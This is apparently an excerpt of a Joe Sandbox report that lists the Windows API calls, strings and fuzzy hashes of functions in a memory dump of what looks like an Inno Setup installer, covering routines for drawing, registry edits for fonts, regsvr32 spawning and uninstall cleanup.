• Opcode ID: eae8990b6dfb44545e31b666042918a45f1fae412ad7defa904a2210dacbb06f
• Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
• Opcode Fuzzy Hash: eae8990b6dfb44545e31b666042918a45f1fae412ad7defa904a2210dacbb06f
• Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
• GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
• GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
• GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc
• String ID: inflate$inflateEnd$inflateInit_$inflateReset
• API String ID: 190572456-3516654456
• Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
• Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
• Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
• Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetBkColor.GDI32(?,00000000), ref: 0041A9B9
• BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
• SetBkColor.GDI32(?,?), ref: 0041AA08
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
• SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
• SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
• StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
• SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
• SetBkColor.GDI32(00000000,?), ref: 0041AAC3
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Color$StretchText
• String ID:
• API String ID: 2984075790-0
• Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
• Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
• Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
• Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseDirectoryHandleSystem
• String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
• API String ID: 2051275411-1862435767
• Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
• Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
• Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
• Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
Uniqueness

Uniqueness Score: -1.00%

APIs
• OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
• GetSysColor.USER32(00000014), ref: 0044D1B0
• SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
• OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
• GetSysColor.USER32(00000010), ref: 0044D202
• SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Text$Color$Draw$OffsetRect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1005981011-0
                                                                                                                                                                                                                                  • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                                                                                                                                                  • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFocus.USER32 ref: 0041B745
• GetDC.USER32(?), ref: 0041B751
• SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
• RealizePalette.GDI32(00000000), ref: 0041B792
• CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Palette$Select$BitmapCreateFocusRealize
• String ID: %H
• API String ID: 3275473261-1959103961
• Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
• Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
• Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
• Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFocus.USER32 ref: 0041BA17
• GetDC.USER32(?), ref: 0041BA23
• SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
• RealizePalette.GDI32(00000000), ref: 0041BA69
• CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Palette$Select$BitmapCreateFocusRealize
• String ID: %H
• API String ID: 3275473261-1959103961
• Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
• Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
• Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
• Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
• OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
• SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
• CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
• Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
Strings
• Deleting Uninstall data files., xrefs: 004964FB
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
• String ID: Deleting Uninstall data files.
• API String ID: 1570157960-2568741658
• Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
• Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
• Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
• Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
• AddFontResourceA.GDI32(00000000), ref: 00470297
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
Strings
• Failed to set value in Fonts registry key., xrefs: 0047026C
• AddFontResource, xrefs: 004702B5
• Failed to open Fonts registry key., xrefs: 00470281
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseFontMessageNotifyOpenResourceSendValue
• String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
• API String ID: 955540645-649663873
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
  • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
  • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
• GetVersion.KERNEL32 ref: 00462E60
• SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
• SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
• LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
• SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
• SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
• String ID: Explorer
• API String ID: 2594429197-512347832
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
• GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
• CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4), ref: 004783CC
• CloseHandle.KERNEL32(00000000,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: FileHandle$AddressAttributesCloseCreateModuleProc
• String ID: GetFinalPathNameByHandleA$kernel32.dll
• API String ID: 2704155762-2318956294
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
  • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
Strings
• Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
• Failed to strip read-only attribute., xrefs: 00459EA0
• Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
• Deleting directory: %s, xrefs: 00459E5B
• Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
• Failed to delete directory (%d)., xrefs: 00459F68
• Stripped read-only attribute., xrefs: 00459E94
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseErrorFindLast
• String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
• API String ID: 754982922-1448842058
                                                                                                                                                                                                                                  • Opcode ID: a90d6a71378203c935e082798c834a37bf98dfb32ab31270fca932f3b1ee089a
                                                                                                                                                                                                                                  • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a90d6a71378203c935e082798c834a37bf98dfb32ab31270fca932f3b1ee089a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetCapture.USER32 ref: 00422EA4
• GetCapture.USER32 ref: 00422EB3
• SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
• ReleaseCapture.USER32 ref: 00422EBE
• GetActiveWindow.USER32 ref: 00422ECD
• SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
• SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
• GetActiveWindow.USER32 ref: 00422FBF
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CaptureMessageSend$ActiveWindow$Release
• String ID:
• API String ID: 862346643-0
• Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
• Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
• Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
• Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
• GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
• GetActiveWindow.USER32 ref: 0042F2DA
• MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
• SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$ActiveLong$Message
• String ID:
• API String ID: 2785966331-0
• Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
• Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
• Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
• Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 0042948A
• GetTextMetricsA.GDI32(00000000), ref: 00429493
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(00000000,00000000), ref: 004294A2
• GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
• SelectObject.GDI32(00000000,00000000), ref: 004294B6
• ReleaseDC.USER32(00000000,00000000), ref: 004294BE
• GetSystemMetrics.USER32(00000006), ref: 004294E3
• GetSystemMetrics.USER32(00000006), ref: 004294FD
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
• String ID:
• API String ID: 1583807278-0
• Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
• Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
• Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
• Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 0041DE27
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
• ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
• MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
• GetStockObject.GDI32(00000007), ref: 0041DE5B
• GetStockObject.GDI32(00000005), ref: 0041DE67
• GetStockObject.GDI32(0000000D), ref: 0041DE73
• LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ObjectStock$CapsDeviceIconLoadRelease
• String ID:
• API String ID: 225703358-0
• Opcode ID: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
• Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
• Opcode Fuzzy Hash: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
• Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadCursorA.USER32(00000000,00007F02), ref: 00463344
• SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
• SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
